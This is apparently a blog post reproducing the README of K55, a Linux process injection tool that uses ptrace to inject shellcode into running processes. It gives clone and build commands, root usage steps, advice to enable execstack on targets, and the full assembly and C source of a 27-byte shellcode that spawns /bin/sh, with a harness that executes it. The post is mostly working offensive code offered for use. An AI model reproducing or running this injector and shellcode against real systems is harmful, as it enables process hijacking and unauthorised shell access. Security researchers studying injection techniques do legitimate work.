K55 : Linux X86_64 Process Injection Utility

The K55 payload injection tool is used for injecting x86_64 shellcode payloads into running processes. The utility was developed using modern C++11 techniques as well as some traditional C linux functions like ptrace().

The shellcode spawned in the target process is 27 bytes and it executes /bin/sh (spawns a bash shell) within the target’s address space. In the future, I will allow users to input there own shellcode via command line arguments.

Installation

git clone https://github.com/josh0xA/K55.git
cd K55
chmod +x build-install.sh
./build-install.sh

Usage

Usage: ./K55 <process-name>

  • process-name can be any linux process with r-xp or execstack permissions.

Tests

Test 1) In one terminal (K55/ Directory), run: ./k55_example_process/k55_test_process
Test 2) In another terminal, run the injector: ./K55 k55_test_process

In Action

  • A shell is spawned in k55_test_process when the K55 shellcode injector is ran (as root).

Injecting Into Given Process

Shell Spawned In Target

Limitations

Obviously, ptrace(PTRACE_POKETEXT...) calls are not the most disguised. So, some applications can limit the effect of K55. Although, for security testing, make sure to turn on execstack for your target applications. For example if I’m testing on gdb, before I would inject, I would run the following: sudo execstack -s /usr/bin/gdb. Install execstack from your distrobutions package manager. For Arch Linux users, you can find execstack on the AUR.

Crafting The Shell Payload

Note: The following is a demonstration. The payload string is already hardcoded into K55.

Assembly Implementation of The Payload (Cited from shell-storm (redirect))

main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall
  • C-Implementation of The Payload
#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}
Download
R K

Share
Published by
R K
Tags: injectionK55linux
5 years ago

Recent Posts

Best OSINT Tools for Journalists 2026: Verify Sources, Images and Claims

Journalists use OSINT to verify public information before publishing. In 2026, misinformation, AI-generated images, fake…

7 hours ago

Install Docker on Ubuntu 20.04: Complete Step-by-Step Guide

Docker is an open-source platform that lets you package and run applications inside containers. Each container…

18 hours ago

Install PostgreSQL on Ubuntu: Database Setup and Admin Guide

PostgreSQL (often called Postgres) is an open-source relational database system. It supports advanced features like JSON…

19 hours ago

Install Xrdp Remote Desktop on Ubuntu: Setup and Connect

Xrdp is an open-source server that lets you connect to your Ubuntu machine from another computer…

19 hours ago

Tomcat 9 on Ubuntu 20.04: Install, Configure, and Start

Apache Tomcat is an open-source web server and Java servlet container. It is one of the…

19 hours ago

Automatic Updates on Ubuntu: Set Up unattended-upgrades

Keeping your Ubuntu system updated is one of the best ways to protect it. Security…

20 hours ago